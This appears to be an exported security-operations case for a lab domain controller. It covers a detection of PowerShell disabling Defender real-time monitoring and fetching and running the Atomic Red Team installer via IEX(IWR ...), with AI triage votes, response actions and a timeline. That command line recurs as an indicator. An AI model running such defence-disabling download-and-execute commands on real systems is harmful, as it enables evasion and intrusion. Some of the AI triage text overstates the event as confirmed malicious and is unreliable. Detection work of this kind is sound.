Severity: high · Status: closed · Verdict: suspicious

๐Ÿท๏ธ Analyst Verdict Classification

SUSPICIOUS by analyst

🤖 AI Analysis

🔔 Detections (1)

Realtime Monitoring Process Killed PID 8396 high
Rule: general.RealTime Monitoring Tampering
Hostname: df-labsdc01.dflabs.local · Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 82% · Verdict: suspicious
Event Data:
BASE_ADDRESS:
140694944940032
COMMAND_LINE:
PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1021.005 -CheckPrereqs ; Invoke-AtomicTest T1021.005 -GetPrereqs ; Invoke-AtomicTest T1021.005
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
155828224
PARENT:
{'BASE_ADDRESS': 140698856259584, 'COMMAND_LINE': 'cmd.exe /C C:\\Windows\\TEMP\\pldB3A2.tmp.bat T1021.005 ', 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\cmd.exe', 'HASH': '3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2', 'MEMORY_USAGE': 4489216, 'PARENT_ATOM': 'd2b1ecad7af81b32ac16ae0d69c2a7fe', 'PARENT_PROCESS_ID': 3496, 'PROCESS_ID': 8396, 'THIS_ATOM': 'd55d696523198bca24198fe369c2a848', 'THREADS': 3, 'TIMESTAMP': 1774364743439, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
8396
PROCESS_ID:
7484
THREADS:
31
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs: {'type': 'command_line', 'value': "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)"} {'type': 'url', 'value': 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1'} {'type': 'technique', 'value': 'T1021.005 (Lateral Movement via Remote Services)'}
MITRE: T1021.005 T1567.001
Analyst Declaration:
📄 Raw Detection JSON
{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Process Killed PID 8396",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1021.005 -CheckPrereqs ; Invoke-AtomicTest T1021.005 -GetPrereqs ; Invoke-AtomicTest T1021.005 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 155828224,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldB3A2.tmp.bat T1021.005 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4489216,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 8396,
        "THIS_ATOM": "d55d696523198bca24198fe369c2a848",
        "THREADS": 3,
        "TIMESTAMP": 1774364743439,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 8396,
      "PROCESS_ID": 7484,
      "THREADS": 31,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "4b0a0986-d73e-4eb4-b561-a59fbcb46da2",
      "event_time": 1774364744023,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 2893,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "d55d696523198bca24198fe369c2a848",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "206ee127bfd4633f7821f3c569c2a84a"
    }
  },
  "detect_id": "31601403-8725-4c95-b727-53cd69c2a84a",
  "gen_time": 1774364746922,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364744\u0026selected=206ee127bfd4633f7821f3c569c2a84a",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "4b0a0986-d73e-4eb4-b561-a59fbcb46da2",
    "event_time": 1774364744023,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 2893,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "d55d696523198bca24198fe369c2a848",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "206ee127bfd4633f7821f3c569c2a84a"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364747000
}
๐ŸŒ Threat Intel JSON
{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}
🤖 Triage JSON
{
  "confidence": 0.825,
  "false_positive_reason": null,
  "investigation_questions": [
    "What other processes were spawned by PID 7484?",
    "Are there any new files or registry keys created on this host?",
    "Was the user account compromised prior to this event?"
  ],
  "ioc_analysis": "The command line explicitly disables real-time monitoring (Set-MpPreference -DisableRealtimeMonitoring $true) and downloads/installs the Atomic Red Team framework via IEX. The use of Invoke-AtomicTest T1021.005 indicates an active test for lateral movement, which is a confirmed malicious intent. While PowerShell.exe is signed and located in System32, the context of execution (disabling security tools, downloading external scripts) overrides these benign indicators.",
  "iocs_extracted": [
    {
      "type": "command_line",
      "value": "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)"
    },
    {
      "type": "url",
      "value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
    },
    {
      "type": "technique",
      "value": "T1021.005 (Lateral Movement via Remote Services)"
    }
  ],
  "mitre_techniques": [
    "T1021.005",
    "T1567.001"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Immediately isolate the host from the network to prevent lateral movement.",
    "Block the source IP and URL at the firewall level.",
    "Review all recent PowerShell execution logs for similar patterns.",
    "Initiate incident response procedures per SOC policy."
  ],
  "risk_score": 82,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious activity where an attacker is disabling real-time monitoring and deploying the Atomic Red Team framework to test for lateral movement. The process tree shows a clear chain of execution from cmd.exe to PowerShell, indicating a deliberate attack rather than a false positive.\n\n**IOC Analysis:** The command line explicitly disables real-time monitoring (Set-MpPreference -DisableRealtimeMonitoring $true) and downloads/installs the Atomic Red Team framework via IEX. The use of Invoke-AtomicTest T1021.005 indicates an active test for lateral movement, which is a confirmed malicious intent. While PowerShell.exe is signed and located in System32, the context of execution (disabling security tools, downloading external scripts) overrides these benign indicators.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe detection involves a legitimate PowerShell process from C:\\Windows\\System32, but the command line disables real-time monitoring and installs Atomic Red Team tools, indicating potential malicious intent to evade detection.\n\n**IOC Analysis:** The FILE_PATH is a known legitimate Windows system binary located in C:\\Windows\\System32, which is expected to be benign. However, the command line includes commands to disable real-time monitoring and install red teaming tools from external sources, which is suspicious. The hash is for a Microsoft-signed binary, supporting legitimacy, but the actions suggest evasion techniques.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}

โš™๏ธ Response Actions

Action: tag
Target: e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
Status: failed
Result: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated

Action: recommended
Target: Manual analyst review required — AI models (split)
Status: executed
Result: General Activity Sweep: 0 events found

Action: recommended
Target: Immediately isolate the host from the network to prevent lateral movement.
Status: executed
Result: Lateral Movement Investigation: 50 events found

Action: recommended
Target: Block the source IP and URL at the firewall level.
Status: executed
Result: General Activity Sweep: 0 events found

Action: recommended
Target: Review all recent PowerShell execution logs for similar patterns.
Status: executed
Result: General Activity Sweep: 0 events found

Action: recommended
Target: Initiate incident response procedures per SOC policy.
Status: executed
Result: General Activity Sweep: 0 events found

๐Ÿ“ Add Note

💬 Notes (6)

🤖 FusionSOC AI 2026-03-24T16:51
🤖 FusionSOC AI 2026-03-24T16:51
🤖 FusionSOC AI 2026-03-24T16:51
🤖 FusionSOC AI 2026-03-24T16:51
🤖 FusionSOC AI 2026-03-24T16:51
🤖 FusionSOC AI 2026-03-24T16:51

📜 Timeline

2026-03-24T17:30:27
analyst
Status changed: investigating → closed
2026-03-24T17:30:23
analyst
Analyst classified as Suspicious (SUSPICIOUS)
2026-03-24T16:51:46
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:51:46
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:51:46
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Initiate incident response procedures per SOC policy. **Sensor:** `e4a1c62d-4d1f...
2026-03-24T16:51:46
FusionSOC
Response action queued: recommended on Initiate incident response procedures per SOC policy.
2026-03-24T16:51:46
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:51:46
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:51:46
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Review all recent PowerShell execution logs for similar patterns. **Sensor:** `e...
2026-03-24T16:51:46
FusionSOC
Response action queued: recommended on Review all recent PowerShell execution logs for similar patterns.
2026-03-24T16:51:46
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:51:46
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:51:46
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Block the source IP and URL at the firewall level. **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T16:51:46
FusionSOC
Response action queued: recommended on Block the source IP and URL at the firewall level.
2026-03-24T16:51:46
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:51:46
FusionSOC
Action recommended → executed: Lateral Movement Investigation: 50 events found
2026-03-24T16:51:46
FusionSOC AI
Note by FusionSOC AI: ## 🔍 Lateral Movement Investigation **Action:** Immediately isolate the host from the network to prevent lateral movemen...
2026-03-24T16:51:45
FusionSOC
Response action queued: recommended on Immediately isolate the host from the network to prevent lateral movement.
2026-03-24T16:51:45
FusionSOC AI
Status changed: open → investigating
2026-03-24T16:51:45
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:51:45
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Manual analyst review required — AI models (split) **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T16:51:44
FusionSOC
Response action queued: recommended on Manual analyst review required — AI models (split)
2026-03-24T16:51:44
FusionSOC
Action tag → failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T16:51:44
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T16:51:44
FusionSOC AI
Detection 31601403-8725-4c95-b727-53cd69c2a84a triaged as suspicious (high severity, confidence: 82%)
2026-03-24T16:51:44
FusionSOC AI
Case created from detection: general.RealTime Monitoring Tampering